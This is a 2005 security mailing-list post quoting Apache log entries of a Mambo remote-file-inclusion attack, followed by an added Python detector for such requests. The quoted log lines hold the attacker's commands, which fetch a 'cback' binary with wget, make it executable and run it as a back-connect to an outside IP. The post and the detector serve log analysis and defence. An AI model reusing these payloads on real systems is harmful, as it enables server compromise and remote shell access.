[Dshield] A Couple of New Apache Hack Patterns

bugtraq@cgisecurity.net bugtraq at cgisecurity.net
Wed Dec 14 19:45:37 GMT 2005


This appears to be the recent Mambo vulnerability.

- zeno
http://www.cgisecurity.com/ Website Security news, and more!
http://www.cgisecurity.com/index.rss Website Security RSS Feed 

> 
> . . . new for me anyway.
> 
> 1. index2.php | index.php
> 
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;.cback%20217.160.242.90%208080;echo%20YYY;echo|HTTP/1.1"
> 302 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1;)"
> 
> or;
> 
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
> HTTP/1.1" 301 562 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
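
Added example, not part of the original thread: one way to flag the request pattern quoted above in Apache access logs, by looking for query parameters that try to overwrite PHP superglobals (GLOBALS, _REQUEST[...]) and for parameters whose value is a remote URL, as with mosConfig_absolute_path. The function name classify and the sample log lines are constructed for illustration (documentation-range addresses), not taken from real traffic.

```python
import re
from urllib.parse import parse_qsl

# Request line inside an Apache common/combined log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names that address a PHP superglobal directly, e.g. GLOBALS or _REQUEST[option]
SUPERGLOBAL_RE = re.compile(
    r'^(?:GLOBALS|_(?:REQUEST|GET|POST|COOKIE|SERVER|FILES|ENV|SESSION))(?:\[|$)')
# Parameter values that point at a remote resource (candidate remote file inclusion)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def classify(log_line):
    """Return a sorted list of findings for one access-log line ([] if none)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    # Everything after the first '?' is the query string; later '?' stay in values.
    query = match.group(1).partition("?")[2]
    findings = set()
    # parse_qsl percent-decodes names and values, so %5FREQUEST%5Bx%5D is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL_RE.match(name):
            findings.add("superglobal-overwrite:" + name.split("[")[0])
        if REMOTE_URL_RE.match(value):
            # Legitimate redirect parameters also match; allow-list those by name.
            findings.add("remote-url-in-param:" + name)
    return sorted(findings)

# Constructed sample lines (not real traffic).
SAMPLE_LINES = [
    '198.51.100.7 - - [14/Dec/2005:19:00:01 +0000] "GET /cvs/index2.php?'
    '_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&'
    'mosConfig_absolute_path=http://192.0.2.10/cmd.gif?&cmd=id HTTP/1.1" '
    '301 562 "-" "Mozilla/4.0"',
    '198.51.100.8 - - [14/Dec/2005:19:00:02 +0000] "GET /index.php?'
    'option=com_content&task=view&id=1&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [14/Dec/2005:19:00:03 +0000] "GET /index2.php?'
    '%5FREQUEST%5Boption%5D=x&mosConfig_absolute_path=http%3A%2F%2F192.0.2.10%2Fa '
    'HTTP/1.1" 302 290 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(classify(line) or "clean", "<-", line[:60])
```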

